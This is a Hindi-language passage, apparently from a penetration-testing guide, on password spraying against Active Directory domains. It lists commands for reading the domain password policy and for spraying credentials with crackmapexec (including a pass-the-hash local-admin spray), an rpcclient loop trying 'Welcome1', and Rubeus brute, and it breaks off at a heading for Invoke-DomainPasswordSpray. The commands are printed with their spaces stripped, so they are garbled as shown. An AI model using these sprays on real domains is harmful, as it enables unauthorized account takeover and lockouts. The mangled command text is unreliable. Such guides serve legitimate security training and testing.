जब आपने कई वैध उपयोगकर्ता नाम पाए हैं, तो आप प्रत्येक पाए गए उपयोगकर्ताओं के साथ सबसे सामान्य पासवर्ड (पर्यावरण की पासवर्ड नीति को ध्यान में रखें) की कोशिश कर सकते हैं।
डिफ़ॉल्ट रूप से न्यूनतम पासवर्ड लंबाई7 है।
ध्यान दें कि आप कुछ गलत पासवर्ड की कोशिश करने पर कुछ खातों को लॉकआउट कर सकते हैं (डिफ़ॉल्ट रूप से 10 से अधिक)।
पासवर्ड नीति प्राप्त करें
यदि आपके पास कुछ उपयोगकर्ता क्रेडेंशियल्स या डोमेन उपयोगकर्ता के रूप में शैली हो तो आप पासवर्ड नीति प्राप्त कर सकते हैं:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
लाभांवित करना लिनक्स से (या सभी से)
crackmapexec का उपयोग:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Metasploit के scanner/smb/smb_login मॉड्यूल के साथ:
rpcclient का उपयोग:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Invoke-DomainPasswordSpray के साथ (यह डिफ़ॉल्ट रूप से डोमेन से उपयोगकर्ताओं को उत्पन्न कर सकता है और यह डोमेन से पासवर्ड नीति प्राप्त करेगा और इसके अनुसार प्रयासों की सीमा निर्धारित करेगा):